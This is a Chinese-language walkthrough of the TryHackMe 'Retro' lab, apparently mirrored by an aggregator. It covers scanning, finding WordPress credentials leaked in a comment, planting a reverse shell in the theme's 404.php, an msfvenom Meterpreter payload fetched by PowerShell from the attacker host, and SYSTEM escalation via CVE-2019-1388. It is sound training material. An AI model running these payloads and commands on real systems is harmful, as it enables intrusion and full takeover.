【Tryhackme】Retro(UAC提权:Windows证书对话框特权提升)
source link: https://segmentfault.com/a/1190000041000480
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
【Tryhackme】Retro(UAC提权:Windows证书对话框特权提升)
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。
┌──(root💀kali)-[~/tryhackme] └─# nmap -sV -Pn 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 05:03 EDT Nmap scan report for 10.10.10.216 Host is up (0.30s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 3389/tcp open ms-wbt-server Microsoft Terminal Services Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.16 seconds
只有一个80服务和数据库
┌──(root💀kali)-[~/dirsearch] └─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545 Output File: /root/dirsearch/reports/10.10.10.216/_21-11-05_05-03-57.txt Error Log: /root/dirsearch/logs/errors-21-11-05_05-03-57.log Target: http://10.10.10.216/ [05:03:57] Starting: [05:04:35] 301 - 150B - /retro -> http://10.10.10.216/retro/
扫到一个目录,浏览了一下,是一个wordpress网站
此时分两步枚举,一继续爆破这个目录,二wpsscan枚举wp信息
wp目录爆破
┌──(root💀kali)-[~/dirsearch] └─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216/retro _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545 Output File: /root/dirsearch/reports/10.10.10.216/-retro_21-11-05_05-08-12.txt Error Log: /root/dirsearch/logs/errors-21-11-05_05-08-12.log Target: http://10.10.10.216/retro/ [05:08:14] Starting: [05:08:21] 301 - 161B - /retro/wp-content -> http://10.10.10.216/retro/wp-content/ [05:08:24] 301 - 162B - /retro/wp-includes -> http://10.10.10.216/retro/wp-includes/ [05:09:04] 301 - 159B - /retro/wp-admin -> http://10.10.10.216/retro/wp-admin/
爆出了三个文件夹,且没有文件遍历漏洞,看上去没有什么可以利用的信息
wp信息枚举
确认wp版本为:5.2.1
└─# wpscan --url http://10.10.10.216/retro _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.14 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]n [+] URL: http://10.10.10.216/retro/ [10.10.10.216] [+] Started: Fri Nov 5 05:09:28 2021 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Microsoft-IIS/10.0 | - X-Powered-By: PHP/7.1.29 | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://10.10.10.216/retro/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] WordPress readme found: http://10.10.10.216/retro/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://10.10.10.216/retro/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21). | Found By: Rss Generator (Passive Detection) | - http://10.10.10.216/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator> | - http://10.10.10.216/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator> [+] WordPress theme in use: 90s-retro | Location: http://10.10.10.216/retro/wp-content/themes/90s-retro/ | Latest Version: 1.4.10 (up to date) | Last Updated: 2019-04-15T00:00:00.000Z | Readme: http://10.10.10.216/retro/wp-content/themes/90s-retro/readme.txt | Style URL: http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1 | Style Name: 90s Retro | Style URI: https://organicthemes.com/retro-theme/ | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n... | Author: Organic Themes | Author URI: https://organicthemes.com | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.4.10 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:12 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:12 [i] No Config Backups Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register [+] Finished: Fri Nov 5 05:10:05 2021 [+] Requests Done: 170 [+] Cached Requests: 5 [+] Data Sent: 44.025 KB [+] Data Received: 221.001 KB [+] Memory used: 210.141 MB [+] Elapsed time: 00:00:36
kali搜索这个版本wp的漏洞
显示存在sql注入
┌──(root💀kali)-[~] └─# searchsploit WordPress 5.2.1 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts | multiple/webapps/47690.md WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service | php/dos/47800.py WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt WordPress Plugin Link Library 5.2.1 - SQL Injection | php/webapps/17887.txt WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
看说明是某个插件有一个注入漏洞,但测试这个wp不存在这个插件,wpscan也没有扫出这个插件
在首页我们看文章的作者名字叫wade
,用这个账号尝试登陆wp提示
ERROR: The password you entered for the username wade is incorrect.
这表示wade
这个账号是确实存在的
我们用wpscan枚举用户名也证明确实存在wade
和Wade
[+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:01:07 <============================================================================================================================================================> (200 / 200) 100.00% Time: 00:01:07 [i] User(s) Identified: [+] wade | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.10.216/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Wade | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
user.txt的提示是:
Don't leave sensitive information out in the open, even if you think you have control over it.
我们假设作者在公共场合谈论了跟自己密码有关的信息,也许藏在博客文章里
期中一篇文章好像透露了一些信息
Ready Player One by Wade I can’t believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it’s because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I’ll eventually get it down. Either way, I’m really excited to see this movie!
Ready Player One就是电源《头号玩家》,
至少我们现在知道作者常常会搞混自己和角色的名字,这个电影主角的名字叫:wade
在这条post的comment下面,作者泄露了自己的密码parzival
:
Wade December 9, 2019 Leaving myself a note here just in case I forget how to spell it: parzival
初始shell
因为系统开了3389服务,用wade:parzival
远程桌面到靶机拿到user.txt
xfreerdp /u:wade /v:10.10.10.216
同时我们可以用上面的凭证登录wordpress
wordpress的渗透套路是,一旦得到了管理员的登录账户就去到Appearance->Theme Edlitor
里编辑源代码
我一般把webshell写到404.php
这个页面,然后在前台访问一个不存在的页面,触发反弹shell
我们把windows版本reverse_shell写到404.php,拿到webshell
┌──(root💀kali)-[~/tryhackme] └─# nc -nlvp 4242 listening on [any] 4242 ... connect to [10.13.21.169] from (UNKNOWN) [10.10.10.216] 49792 SOCKET: Shell has connected! PID: 3436 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\inetpub\wwwroot\retro>whoami iis apppool\retro
我们用msfvenom生成一个稳定的shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4444 -f exe > shell_64.exe
用webshell上传到靶机
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.13.21.169:8000/shel...','C:\users\public\Downloads\shell_64.exe')"
把nc和wget下载到靶机,以便后续渗透使用,经测试C:\users\public\Downloads
是可写的:
在远程桌面,用wade的账号点击shell_64.exe
,收到wade的反弹shell
msf6 exploit(windows/local/bypassuac_sdclt) > use exploit/multi/handler [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST tun0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.13.21.169:4444 [*] Sending stage (200262 bytes) to 10.10.10.216 [*] Meterpreter session 3 opened (10.13.21.169:4444 -> 10.10.10.216:50582) at 2021-11-22 05:48:04 -0500 meterpreter > getuid Server username: RETROWEB\Wade
关于提权的提示是:
Figure out what the user last was trying to find. Otherwise, put this one on ice and get yourself a better shell, perhaps one dipped in venom.
我开头以为是在cmd或者powershell里找历史命令,但是没有收获。后来发现是在浏览器的历史记录里,作者留下了寻找CVE-2019-1388
的提示
我在github上找到了这个提权脚本。
github上的解释比较简单,我后面根据这篇详细介绍这个漏洞原理的文章提权到了system
总的来说提权原理就是文章里这段:
当 OID 为超链接时,通过点击此链接会触发 consent.exe 以 SYSTEM 权限打开浏览器访问此链接,然后此浏览器就会有 SYSTEM 权限。通过保存该浏览页面,会弹出微软的资源管理器,在资源管理器中邮件打开 cmd.exe 程序,就会继承浏览器的 SYSTEM 权限,由此就完成了由普通用户到 NT AUTHORITY\SYSTEM 用户的提权!
在Administrator
桌面拿到root.txt
C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 7443-948C Directory of C:\Users\Administrator\Desktop 12/08/2019 08:06 PM <DIR> . 12/08/2019 08:06 PM <DIR> .. 12/08/2019 08:08 PM 32 root.txt.txt 1 File(s) 32 bytes 2 Dir(s) 30,362,959,872 bytes free
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK